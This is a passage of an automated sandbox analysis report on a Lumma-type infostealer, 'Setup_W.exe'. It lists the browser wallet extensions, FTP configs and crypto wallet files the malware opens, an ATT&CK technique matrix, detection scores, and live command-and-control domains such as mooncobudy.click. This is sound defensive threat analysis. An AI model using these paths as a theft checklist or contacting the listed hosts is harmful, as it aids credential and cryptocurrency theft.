              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: Yara matchFile source: 00000004.00000003.2145451743.00000000032DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2145593469.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7680, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7680, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services41
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              311
              Process Injection
              41
              Input Capture
              121
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API
              Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares41
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login HookLogin Hook1
              Obfuscated Files or Information
              NTDS1
              Process Discovery
              Distributed Component Object Model3
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              Peripheral Device Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Setup_W.exe64%VirustotalBrowse
              Setup_W.exe47%ReversingLabsWin32.Spyware.Lummastealer
              Setup_W.exe100%AviraHEUR/AGEN.1318174
              Setup_W.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://mooncobudy.click/api0%Avira URL Cloudsafe
              https://mooncobudy.click:443/api0%Avira URL Cloudsafe
              https://mooncobudy.click/);0%Avira URL Cloudsafe
              mooncobudy.click0%Avira URL Cloudsafe
              https://mooncobudy.click:443/apiPeYB0%Avira URL Cloudsafe
              https://mooncobudy.click/api70%Avira URL Cloudsafe
              https://mooncobudy.click/0%Avira URL Cloudsafe
              https://mooncobudy.click/apiD0%Avira URL Cloudsafe
              https://mooncobudy.click:443/api2o4p.default-release/key4.dbPK0%Avira URL Cloudsafe
              https://mooncobudy.click/apiF9tl0%Avira URL Cloudsafe
              https://mooncobudy.click/s0%Avira URL Cloudsafe
              https://mooncobudy.click/t0%Avira URL Cloudsafe
              https://mooncobudy.click/m0%Avira URL Cloudsafe
              https://mooncobudy.click/api/0%Avira URL Cloudsafe
              https://mooncobudy.click/apiO0%Avira URL Cloudsafe
              https://mooncobudy.click/apiK0%Avira URL Cloudsafe
              https://mooncobudy.click/I:0%Avira URL Cloudsafe
              https://mooncobudy.click/s):0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              mooncobudy.click
              104.21.44.57
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                necklacebudi.latfalse
                  high
                  aspecteirs.latfalse
                    high
                    https://mooncobudy.click/apitrue
                    • Avira URL Cloud: safe
                    unknown
                    sustainskelet.latfalse
                      high
                      crosshuaht.latfalse
                        high
                        rapeflowwj.latfalse
                          high
                          mooncobudy.clicktrue
                          • Avira URL Cloud: safe
                          unknown
                          energyaffai.latfalse
                            high
                            grannyejh.latfalse
                              high
                              discokeyus.latfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.c.lencr.org/0BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://mooncobudy.click:443/api2o4p.default-release/key4.dbPKBitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://mooncobudy.click/apiDBitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://mooncobudy.click:443/apiBitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145909317.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063109527.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://mooncobudy.click/apiF9tlBitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgBitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://mooncobudy.click:443/apiPeYBBitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://mooncobudy.click/);BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://mooncobudy.click/api7BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://mooncobudy.click/BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://mooncobudy.click/api/BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://mooncobudy.click/tBitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://mooncobudy.click/sBitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://mooncobudy.click/mBitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://crl.microBitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145610434.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292604362.00000000032D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.microsofBitLockerToGo.exe, 00000004.00000003.2064540383.00000000055B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://mooncobudy.click/I:BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://mooncobudy.click/apiKBitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
